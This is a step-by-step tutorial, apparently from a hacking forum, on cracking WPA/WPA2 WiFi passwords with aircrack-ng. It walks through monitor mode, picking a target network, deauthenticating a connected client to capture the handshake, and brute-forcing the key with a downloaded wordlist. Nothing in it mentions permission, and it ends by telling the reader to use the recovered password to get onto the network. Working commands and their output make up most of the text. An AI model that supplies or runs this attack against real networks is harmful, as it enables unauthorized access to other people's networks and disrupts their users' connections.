Cracking WPA WiFi

Cracking WPA WiFi,  using Kali Linux Operating System and BackTrack Operating System. These both can be useful which has pre-installed tools inside it! All you have to do is open up your terminal and search for any tool usage.

This small + simple guide is for those who want to know some basics,
you will need to be on a linux OS for this, Preferably Kali linux or at the least a distro of Back Track, If you don’t have either of those you will need to install the software

Install software:
sudo apt-get install aircrack-ng (wpa/2 cracking)

# Anything with a hash (‘#’) we will not type as code, they will just be comments.

# In Terminal/konsole… :

ifconfig #Displays list of network adaptors.

# You want to get the name of your wireless card, It should be somthing like: wlan0, eth1…
# It is unlikely to be ‘lo, eth0…’ If you do not know what your network card device is named,
# use google to help you find out.

# Command 1:

airmon-ng start (name of wireless card)

# EG: airmon-ng start wlan0

# You should see something saying “(monitor mode enabled on mon0)”
# If you don’t see that or there is an error (not a warning) then you did something wrong.
# You can check its working by typing ” ifconfig ” again, this time looking for ‘mon0’
# If you have ‘mon0’ you have completed the task above.

# Command 2:

airodump-ng -i mon0

# This will present to you a list of all the wireless networks, under ‘ESSID’ you can see the
# Name of the network, It should look something like this:

# 00:11:22:33:44:55 -35 300 200 0 11 54e WPA2 CCMP PSK Wireless_network_ESSID

# You want to make sure the network you are attacking has ‘WPA’ or ‘WPA2′ as that is guide
# only shows you how to crack that encryption type.

# You then want to copy the BSSID, in this case its ’00:11:22:33:44:55’.
# You also want to keep not of what ‘CH’ (Channel) it is on, in this case its ’11’

# Command 3:

airodump-ng -i mon0 --bssid (BSSID) -c (Channel) -w (any filename)

# EG: airodump-ng -i mon0 –bssid 00:11:22:33:44:55 -c 11 -w capture1 –ignore-negative-one

# Leave this running for a while, for the attack to be successful and for us to proceed…
# There will need to be devices connected to the network that we are attacking.
# We will know if there are ‘clients’ (devices) on this network when a/some entries
# Show up under the ‘STATION’ Heading. Make sure there is also a ‘BSSID’ next to the
# Station. Everything should look something like this:

# CH 11 ][ Elapsed: 1 mins ][ 2014-02-28 20:20
# BSSID   PWR   RXQ   Beacons   #Data,  #/s   CH   MB  ENC   CIPHER   AUTH   ESSID
# 00:11:22:33:44:55  -35  100  20  60  30  11  54e  WPA2  CCMP  PSK  Wireless_network_ESSID
# BSSID    STATION    PWR  Rate   Lost    Frames  Probe
# AA:BB:CC:DD:EE:FF   00:11:22:33:44:55    0  12e-1  0  105   -

# There is no way I can make that all line up because HF removes multiple spaces so deal with it…

# So once you are sure there is a ‘client’ connected to the network we need to de-auth them
# In a new Terminal window (keeping this previous one still open) type:

# Command 4:

aireplay-ng -0 1 -a (BSSID) -c (client's Station) mon0 --ignore-negative-one

# EG: aireplay-ng -0 1 -a AA:BB:CC:DD:EE:FF -c 00:11:22:33:44:55 mon0 –ignore-negative-one

# After executing this command go back to the other Terminal window and check if we captured
# A handshake. At the top next to (Right of) the date/time ie: ‘2014-03-01 12:25’ we will see:

# 2014-03-01 12:25 ][ WPA handshake: AA:BB:CC:DD:EE:FF

# You may need to repeat Command 4 with different clients (or same) until you get a handshake.
# You can also use Command 4 without specifying the client (‘-c 00:11:22:33:44:55’), by removing
# This part there is still a chance if deauthing a client, but is less likely…

# So now you have captured the WPA handshake we can begin cracking it (decrypting)
# You can stop the ‘airodump-ng’ by pushing ‘ctrl + c’ and turn your aircard off monitor mode

# Command 5

airmon-ng stop mon0

# You not no longer actually need to be in the same area as the access point, you can go home if you want.

# For this next step you probably want a strong computer (powerful CPU), If you will just use the same computer
# Thats ok too, if you do decide to use another computer you will need to install ‘aircrack-ng’, this is available on
# any platform…

# You also are going to need a wordlist and a lot of free time (or able to leave computer running)
# I’d recommend a wordlist from CrackStation
# I commonly use the 247MB (648MB expanded) download, but if you have a good computer and like 42
# hours to spare you can use the 4.2GB (15GB expanded) one.

# Command 6:

aircrack-ng -w (wordlist) -b (bssid) (capture file)

#EG: aircrack-ng -w Downloads/crackstation-human-only.txt -b AA:BB:CC:DD:EE:FF captures/capture1.ivs

# Note: The ‘-b AA:BB:CC:DD:EE:FF’ is optional, if you don’t specify it it will just give you a list to choose
# from, likely to be the only one you attacked. If you did not successfully captured the handshake it will say
# “Got no data packets from target network!”

# If everything worked you should be presented with something like this:

#  Aircrack-ng 1.2 beta2
#  [00:00:05] 205 keys tested (500 k/s)
#  Current passphrase: potato
# Master Key : 00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
#      00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
# Transient Key: 00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
#      00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
#      00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
#      00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
# EAPOL HMAC   : 00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF

# After letting this run through for freken ages you should see:

# KEY FOUND! [ password123 ]

# And now you can access the network with the wpa password.